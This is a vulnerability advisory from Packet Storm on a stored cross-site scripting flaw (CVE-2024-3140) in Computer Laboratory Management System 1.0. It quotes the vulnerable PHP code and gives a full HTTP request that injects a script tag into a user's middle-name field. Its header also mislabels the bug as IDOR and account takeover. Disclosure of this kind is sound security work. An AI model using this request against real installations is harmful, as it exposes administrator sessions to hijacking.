what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Computer Laboratory Management System 1.0 Cross Site Scripting

Computer Laboratory Management System 1.0 Cross Site Scripting
Posted Apr 2, 2024
Authored by SoSPiro

Computer Laboratory Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2024-3140
SHA-256 | bf5815c0f1d58d3958bef3adb0e854fe8a2586b75a2f18b16645f513f75c79a1

Computer Laboratory Management System 1.0 Cross Site Scripting

Change Mirror Download
#Vulnerability Details:
#Application Name: Computer Laboratory Management System
#Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html
#Vendor Homepage: https://www.sourcecodester.com/users/tips23
#BuG: Insecure Direct Object References (IDOR) and Account Takeover
#BuG_Author: SoSPiro
#CVE: CVE-2024-3140

# Vulnerable code section:

foreach($_POST as $k => $v){
$v = $this->conn->real_escape_string($v);
if(in_array($k, $main_field)){
if(!empty($data)) $data .= ", ";
$data .= " `{$k}` = '{$v}' ";
}
}

- The vulnerable section of the code lies within the registration() method of the Users class. Specifically, the lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.

# Vulnerability Description:

- The vulnerability arises due to the lack of proper validation and sanitization of user-supplied data before it is used in constructing SQL queries. This allows an attacker to inject malicious scripts, such as JavaScript code, into the database. When the administrator views the user list, the injected script gets executed, leading to a Cross-Site Scripting (XSS) attack.


# Proof of Concept (PoC):

- Poc Video : https://drive.google.com/file/d/1iTJZz3QzLUkKeso5iHfBMlNbIwZy1X-Y/view?usp=sharing


- Request:


POST /php-lms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------381104392340117332004262429571
Content-Length: 946
Origin: http://localhost
Connection: close
Referer: http://localhost/php-lms/admin/?page=user
Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-PwnFox-Color: green

-----------------------------381104392340117332004262429571
Content-Disposition: form-data; name="id"

8
-----------------------------381104392340117332004262429571
Content-Disposition: form-data; name="firstname"

staff2
-----------------------------381104392340117332004262429571
Content-Disposition: form-data; name="middlename"

<script>alert(1)</script>
-----------------------------381104392340117332004262429571
Content-Disposition: form-data; name="lastname"

asd
-----------------------------381104392340117332004262429571
Content-Disposition: form-data; name="username"

staff
-----------------------------381104392340117332004262429571
Content-Disposition: form-data; name="password"


-----------------------------381104392340117332004262429571
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------381104392340117332004262429571--

- In this POST request, an attacker has included a script tag in the "middlename" field:

<script>alert(1)</script>

- When the administrator views the user list, this script tag will be executed, leading to the alert dialog box with the message "1" being displayed. This demonstrates the XSS vulnerability in the application.



# Impact:

- The impact of this vulnerability is significant. An attacker can execute arbitrary JavaScript code within the context of the administrator's session, potentially leading to theft of sensitive information, session hijacking, or defacement of the application. Additionally, since the XSS payload executes within the administrator's session, it can lead to further exploitation of the system or its users.



# Reproduce:

https://github.com/Sospiro014/zday1/blob/main/xss_1.md
https://vuldb.com/?id.258915
https://www.cve.org/CVERecord?id=CVE-2024-3140



Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close